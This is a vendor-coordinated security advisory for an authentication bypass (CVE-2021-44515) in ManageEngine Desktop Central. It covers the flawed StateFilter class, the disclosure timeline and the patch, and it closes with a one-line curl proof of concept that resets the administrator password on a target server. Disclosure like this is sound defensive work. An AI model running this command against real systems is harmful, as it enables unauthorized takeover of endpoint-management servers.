SRC-2022-0001 : Zoho ManageEngine Desktop Central StateFilter Arbitrary Forward Authentication Bypass Vulnerability
ManageEngine Desktop Central and ManageEngine Desktop Central MSP <= 10.1.2137.2
This vulnerability allows remote attackers to bypass authentication on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the StateFilter class. The issue results from an arbitrary forward during request handling. An attacker can leverage this vulnerability to bypass authentication on the system and reset the administrators password.
Zoho has issued an update to correct this vulnerability. More details can be found at: https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html
- 2019-12-12 - Discovered and unreported
- 2021-12-03 - Patched by Zoho
- 2022-01-21 - Public release of advisory
Proof of Concept:
curl -kb "STATE_COOKIE=&_REQS/_TIME/1337" "https://target.tld:8383/STATE_ID/1337/changeDefaultAmazonPassword?loginName=admin&newUserPassword=haxed" -d ""
This vulnerability was discovered by Steven Seeley of Source Incite